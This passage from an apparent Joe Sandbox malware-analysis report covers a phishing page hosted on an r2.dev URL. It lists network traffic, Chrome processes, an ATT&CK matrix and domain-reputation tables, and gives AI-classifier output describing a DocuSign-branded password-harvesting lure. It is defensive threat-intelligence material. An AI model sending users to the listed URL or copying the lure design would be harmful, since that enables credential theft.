      Source: sets.json.0.drString found in binary or memory: https://tvn24.pl
      Source: sets.json.0.drString found in binary or memory: https://unotv.com
      Source: sets.json.0.drString found in binary or memory: https://victorymedium.com
      Source: sets.json.0.drString found in binary or memory: https://vrt.be
      Source: sets.json.0.drString found in binary or memory: https://vwo.com
      Source: sets.json.0.drString found in binary or memory: https://welt.de
      Source: sets.json.0.drString found in binary or memory: https://wieistmeineip.de
      Source: sets.json.0.drString found in binary or memory: https://wildix.com
      Source: sets.json.0.drString found in binary or memory: https://wildixin.com
      Source: sets.json.0.drString found in binary or memory: https://wingify.com
      Source: sets.json.0.drString found in binary or memory: https://wordle.at
      Source: sets.json.0.drString found in binary or memory: https://wp.pl
      Source: sets.json.0.drString found in binary or memory: https://wpext.pl
      Source: sets.json.0.drString found in binary or memory: https://www.asadcdn.com
      Source: chromecache_115.2.drString found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l
      Source: sets.json.0.drString found in binary or memory: https://ya.ru
      Source: sets.json.0.drString found in binary or memory: https://yours.co.uk
      Source: sets.json.0.drString found in binary or memory: https://zalo.me
      Source: sets.json.0.drString found in binary or memory: https://zdrowietvn.pl
      Source: sets.json.0.drString found in binary or memory: https://zingmp3.vn
      Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59187 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61120
      Source: unknownNetwork traffic detected: HTTP traffic on port 61120 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61121
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 59188 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59187
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59188
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 61121 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:61120 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:61121 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:59188 version: TLS 1.2
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150\sets.jsonJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150\manifest.jsonJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150\LICENSEJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150\_metadata\Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150\_metadata\verified_contents.jsonJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5040_1686804150\manifest.fingerprintJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\chrome_BITS_5040_1058925059Jump to behavior
      Source: classification engineClassification label: mal100.phis.win@23/15@10/7
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2100,i,4522708005830675999,13489638226651397043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 --field-trial-handle=2100,i,4522708005830675999,13489638226651397043,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid AccountsWindows Management Instrumentation1
      Scripting
      1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      http://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html16%VirustotalBrowse
      http://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html100%SlashNextCredential Stealing type: Phishing & Social usering
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      www.google.com0%VirustotalBrowse
      bg.microsoft.map.fastly.net0%VirustotalBrowse
      fp2e7a.wpc.phicdn.net0%VirustotalBrowse
      pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev6%VirustotalBrowse
      www.continentalsports.co.uk0%VirustotalBrowse
      SourceDetectionScannerLabelLink
      https://wieistmeineip.de0%URL Reputationsafe
      https://wieistmeineip.de0%URL Reputationsafe
      https://mercadoshops.com.co0%URL Reputationsafe
      https://gliadomain.com0%URL Reputationsafe
      https://poalim.xyz0%URL Reputationsafe
      https://mercadolivre.com0%URL Reputationsafe
      https://reshim.org0%URL Reputationsafe
      https://nourishingpursuits.com0%URL Reputationsafe
      https://medonet.pl0%URL Reputationsafe
      https://unotv.com0%URL Reputationsafe
      https://mercadoshops.com.br0%URL Reputationsafe
      https://zdrowietvn.pl0%URL Reputationsafe
      https://johndeere.com0%URL Reputationsafe
      https://songstats.com0%URL Reputationsafe
      https://baomoi.com0%URL Reputationsafe
      https://supereva.it0%URL Reputationsafe
      https://elfinancierocr.com0%URL Reputationsafe
      https://bolasport.com0%URL Reputationsafe
      https://rws1nvtvt.com0%URL Reputationsafe
      https://desimartini.com0%URL Reputationsafe
      https://hearty.app0%URL Reputationsafe
      https://hearty.gift0%URL Reputationsafe
      https://mercadoshops.com0%URL Reputationsafe
      https://heartymail.com0%URL Reputationsafe
      https://p106.net0%URL Reputationsafe
      https://radio2.be0%URL Reputationsafe
      https://finn.no0%URL Reputationsafe
      https://hc1.com0%URL Reputationsafe
      https://kompas.tv0%URL Reputationsafe
      https://mystudentdashboard.com0%URL Reputationsafe
      https://songshare.com0%URL Reputationsafe
      https://smaker.pl0%URL Reputationsafe
      https://mercadopago.com.mx0%URL Reputationsafe
      https://p24.hu0%URL Reputationsafe
      https://talkdeskqaid.com0%URL Reputationsafe
      https://mercadopago.com.pe0%URL Reputationsafe
      https://cardsayings.net0%URL Reputationsafe
      https://text.com0%URL Reputationsafe
      https://mightytext.net0%URL Reputationsafe
      https://pudelek.pl0%URL Reputationsafe
      https://hazipatika.com0%URL Reputationsafe
      https://joyreactor.com0%URL Reputationsafe
      https://cookreactor.com0%URL Reputationsafe
      https://wildixin.com0%URL Reputationsafe
      https://eworkbookcloud.com0%URL Reputationsafe
      https://cognitiveai.ru0%URL Reputationsafe
      https://nacion.com0%URL Reputationsafe
      https://chennien.com0%URL Reputationsafe
      https://drimer.travel0%URL Reputationsafe
      https://deccoria.pl0%URL Reputationsafe
      https://mercadopago.cl0%URL Reputationsafe
      https://talkdeskstgid.com0%URL Reputationsafe
      https://bonvivir.com0%URL Reputationsafe
      https://carcostadvisor.be0%URL Reputationsafe
      https://salemovetravel.com0%URL Reputationsafe
      https://sapo.io0%URL Reputationsafe
      https://wpext.pl0%URL Reputationsafe
      https://welt.de0%URL Reputationsafe
      https://poalim.site0%URL Reputationsafe
      https://drimer.io0%URL Reputationsafe
      https://infoedgeindia.com0%URL Reputationsafe
      https://blackrockadvisorelite.it0%URL Reputationsafe
      https://cognitive-ai.ru0%URL Reputationsafe
      https://cafemedia.com0%URL Reputationsafe
      https://graziadaily.co.uk0%URL Reputationsafe
      https://thirdspace.org.au0%URL Reputationsafe
      https://mercadoshops.com.ar0%URL Reputationsafe
      https://smpn106jkt.sch.id0%URL Reputationsafe
      https://elpais.uy0%URL Reputationsafe
      https://landyrev.com0%URL Reputationsafe
      https://the42.ie0%URL Reputationsafe
      https://commentcamarche.com0%URL Reputationsafe
      https://tucarro.com.ve0%URL Reputationsafe
      https://rws3nvtvt.com0%URL Reputationsafe
      https://eleconomista.net0%URL Reputationsafe
      https://helpdesk.com0%URL Reputationsafe
      https://mercadolivre.com.br0%URL Reputationsafe
      https://clmbtech.com0%URL Reputationsafe
      https://standardsandpraiserepurpose.com0%URL Reputationsafe
      https://salemovefinancial.com0%URL Reputationsafe
      https://mercadopago.com.br0%URL Reputationsafe
      https://commentcamarche.net0%URL Reputationsafe
      https://etfacademy.it0%URL Reputationsafe
      https://mighty-app.appspot.com0%URL Reputationsafe
      https://hj.rs0%URL Reputationsafe
      https://hearty.me0%URL Reputationsafe
      https://mercadolibre.com.gt0%URL Reputationsafe
      https://timesinternet.in0%URL Reputationsafe
      https://indiatodayne.in0%URL Reputationsafe
      https://idbs-staging.com0%URL Reputationsafe
      https://blackrock.com0%URL Reputationsafe
      https://idbs-eworkbook.com0%URL Reputationsafe
      https://motherandbaby.com0%URL Reputationsafe
      https://joyreactor.cc1%VirustotalBrowse
      https://naukri.com0%VirustotalBrowse
      https://24.hu0%VirustotalBrowse
      https://interia.pl0%VirustotalBrowse
      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg0%VirustotalBrowse
      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l0%VirustotalBrowse
      https://nlc.hu0%VirustotalBrowse
      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      199.232.210.172
      truefalseunknown
      www.google.com
      142.250.185.132
      truefalseunknown
      pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev
      172.66.0.235
      truetrueunknown
      www.continentalsports.co.uk
      95.154.228.177
      truefalseunknown
      fp2e7a.wpc.phicdn.net
      192.229.221.95
      truefalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpgfalseunknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://wieistmeineip.desets.json.0.drfalse
      • URL Reputation: safe
      • URL Reputation: safe
      unknown
      https://mercadoshops.com.cosets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://gliadomain.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://poalim.xyzsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadolivre.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://reshim.orgsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://nourishingpursuits.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://medonet.plsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://unotv.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadoshops.com.brsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://joyreactor.ccsets.json.0.drfalseunknown
      https://zdrowietvn.plsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://johndeere.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://songstats.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://baomoi.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://supereva.itsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://elfinancierocr.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://bolasport.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://rws1nvtvt.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://desimartini.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://hearty.appsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://hearty.giftsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadoshops.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://heartymail.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://nlc.husets.json.0.drfalseunknown
      https://p106.netsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://radio2.besets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://finn.nosets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://hc1.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://kompas.tvsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mystudentdashboard.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://songshare.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://smaker.plsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadopago.com.mxsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://p24.husets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://talkdeskqaid.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://24.husets.json.0.drfalseunknown
      https://mercadopago.com.pesets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://cardsayings.netsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://text.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mightytext.netsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://pudelek.plsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://hazipatika.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://joyreactor.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://cookreactor.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://wildixin.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://eworkbookcloud.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://cognitiveai.rusets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://nacion.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://chennien.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://drimer.travelsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://deccoria.plsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadopago.clsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://talkdeskstgid.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://naukri.comsets.json.0.drfalseunknown
      https://interia.plsets.json.0.drfalseunknown
      https://bonvivir.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://carcostadvisor.besets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://salemovetravel.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://sapo.iosets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://wpext.plsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://welt.desets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://poalim.sitesets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://drimer.iosets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://infoedgeindia.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://blackrockadvisorelite.itsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://cognitive-ai.rusets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://cafemedia.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://graziadaily.co.uksets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://thirdspace.org.ausets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadoshops.com.arsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://smpn106jkt.sch.idsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://elpais.uysets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://landyrev.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://the42.iesets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/lchromecache_115.2.drfalseunknown
      https://commentcamarche.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://tucarro.com.vesets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://rws3nvtvt.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://eleconomista.netsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://helpdesk.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadolivre.com.brsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://clmbtech.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://standardsandpraiserepurpose.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://07c225f3.onlinesets.json.0.drfalseunknown
      https://salemovefinancial.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadopago.com.brsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://commentcamarche.netsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://etfacademy.itsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mighty-app.appspot.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://hj.rssets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://hearty.mesets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://mercadolibre.com.gtsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://timesinternet.insets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://indiatodayne.insets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://idbs-staging.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://blackrock.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://idbs-eworkbook.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      https://motherandbaby.comsets.json.0.drfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      162.159.140.237
      unknownUnited States
      13335CLOUDFLARENETUSfalse
      142.250.185.132
      www.google.comUnited States
      15169GOOGLEUSfalse
      95.154.228.177
      www.continentalsports.co.ukUnited Kingdom
      20860IOMART-ASGBfalse
      239.255.255.250
      unknownReserved
      unknownunknownfalse
      172.66.0.235
      pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.devUnited States
      13335CLOUDFLARENETUStrue
      IP
      192.168.2.4
      192.168.2.6
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1521724
      Start date and time:2024-09-29 02:44:41 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 3m 25s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:browseurl.jbs
      Sample URL:http://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:8
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.phis.win@23/15@10/7
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 142.250.186.163, 74.125.206.84, 142.250.186.46, 34.104.35.123, 216.58.206.42, 172.217.16.138, 142.250.184.202, 216.58.212.138, 142.250.185.138, 142.250.185.170, 142.250.185.106, 142.250.185.202, 172.217.18.10, 142.250.185.74, 142.250.186.170, 142.250.74.202, 142.250.186.42, 142.250.185.234, 142.250.181.234, 142.250.184.234, 4.175.87.197, 192.229.221.95, 20.242.39.171, 199.232.210.172, 52.165.164.15, 20.3.187.198, 131.107.255.255, 142.250.186.67, 2.19.126.163, 2.19.126.137
      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtSetInformationFile calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      No simulations
      InputOutput
      URL: https://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html Model: jbxai
      {
      "brand":["DocuSign"],
      "contains_trigger_text":true,
      "trigger_text":"Log in to access document",
      "prominent_button_name":"Authorize",
      "text_input_field_labels":["Password",
      "Enter password"],
      "pdf_icon_visible":false,
      "has_visible_captcha":false,
      "has_urgent_text":false,
      "has_visible_qrcode":false}
      URL: https://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html Model: jbxai
      {
      "phishing_score":9,
      "brands":"DocuSign",
      "legit_domain":"docusign.com",
      "classification":"wellknown",
      "reasons":["The brand 'DocuSign' is well-known and widely recognized.",
      "The provided URL 'pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev' does not match the legitimate domain 'docusign.com'.",
      "The URL contains a random string and uses a '.dev' domain extension,
       which is unusual for a legitimate DocuSign site.",
      "The presence of input fields asking for a password is suspicious,
       especially given the mismatch in the domain."],
      "brand_matches":[false],
      "url_match":false,
      "brand_input":"DocuSign",
      "input_fields":"Password,
       Enter password"}
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):1558
      Entropy (8bit):5.11458514637545
      Encrypted:false
      SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
      MD5:EE002CB9E51BB8DFA89640A406A1090A
      SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
      SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
      SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
      Malicious:false
      Reputation:low
      Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
